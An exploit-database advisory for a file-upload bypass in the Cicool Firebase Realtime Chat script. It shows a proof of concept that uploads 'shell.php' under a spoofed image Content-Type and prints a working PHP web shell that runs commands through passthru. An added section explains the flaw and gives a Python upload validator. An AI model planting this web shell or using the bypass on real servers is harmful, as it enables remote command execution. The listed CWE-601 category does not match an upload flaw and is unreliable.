CVE | Category | Price | Severity |
---|---|---|---|
 | CWE-601 | $500 | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unknown | High | Remote | 2019-10-21 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H | 0.02192 | 0.50148 |
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] Exploit Title : Cicool - Firebase Realtime Chat upload shell bypass
[+] Author :
[+] Team: VHB Group
[+] Tested on : Windows 10/Linux
[+] Home Page: https://codecanyon.net/item/cicool-firebase-realtime-chat/24842321
[+]
[+] Demo : https://cicool.go-moment.com/version/v3//uploads/chat/20191021151333-2019-10-21chat151329.html

POC

fix queries with Burp Suite. You can go to the chat page and edit the information

Content-Disposition: form-data; name="qqfile"; filename="shell.php"
Content-Type: image/jpeg

<form action="" method="get">
Command: <input type="text" name="cmd" /><input type="submit" value="Exec" />
</form>
Output:<br />
<pre><?php passthru($_REQUEST['cmd'], $result); ?></pre>
-----------------------------307831217212391--
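
The PoC above works because the upload is judged by the client-supplied Content-Type header rather than by the file itself. The following check is an added example, not code from the original post or from the Cicool project: it parses a multipart body and rejects any file part whose extension or leading bytes fall outside an image allowlist. The allowlist, the function names and the sample request are assumptions constructed for illustration.

```python
import email
from pathlib import PurePosixPath

# Allowlist (assumption for this example): extension -> accepted magic bytes.
ALLOWED = {
    ".jpg": (b"\xff\xd8\xff",), ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",), ".gif": (b"GIF87a", b"GIF89a"),
}

def check_part(filename, declared_type, data):
    """Return rejection reasons for one uploaded file; empty list = accept."""
    reasons = []
    suffixes = [s.lower() for s in PurePosixPath(filename).suffixes]
    # Exactly one extension, and it must be on the allowlist.
    if len(suffixes) != 1 or suffixes[0] not in ALLOWED:
        reasons.append(f"extension not allowed: {''.join(suffixes) or '(none)'}")
    # Judge the bytes themselves; the client-declared type is only logged.
    expected = ALLOWED.get(suffixes[-1], ()) if suffixes else ()
    if not data.startswith(expected):
        reasons.append(f"content is not the expected image (declared {declared_type})")
    return reasons

def scan_request(content_type, body):
    """Parse a multipart/form-data body and check every file part."""
    msg = email.message_from_bytes(
        b"Content-Type: " + content_type.encode() + b"\r\n\r\n" + body)
    results = {}
    for part in msg.walk():
        name = part.get_filename()
        if name:
            data = part.get_payload(decode=True) or b""
            results[name] = check_part(name, part.get_content_type(), data)
    return results

# Constructed sample request body, modelled on the part headers in the PoC.
SAMPLE_TYPE = "multipart/form-data; boundary=constructed-boundary-0001"
SAMPLE_BODY = (
    b"--constructed-boundary-0001\r\n"
    b'Content-Disposition: form-data; name="qqfile"; filename="shell.php"\r\n'
    b"Content-Type: image/jpeg\r\n\r\n"
    b"<?php /* constructed placeholder body */ ?>\r\n"
    b"--constructed-boundary-0001\r\n"
    b'Content-Disposition: form-data; name="qqfile"; filename="photo.jpg"\r\n'
    b"Content-Type: image/jpeg\r\n\r\n"
    b"\xff\xd8\xff\xe0 constructed JPEG header\r\n"
    b"--constructed-boundary-0001--\r\n"
)

if __name__ == "__main__":
    for name, reasons in scan_request(SAMPLE_TYPE, SAMPLE_BODY).items():
        print(name, "REJECT" if reasons else "accept", reasons)
```

A file that passes should still be stored under a server-generated name in a directory where the web server does not execute scripts.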
Copyright ©2024 Exploitalert.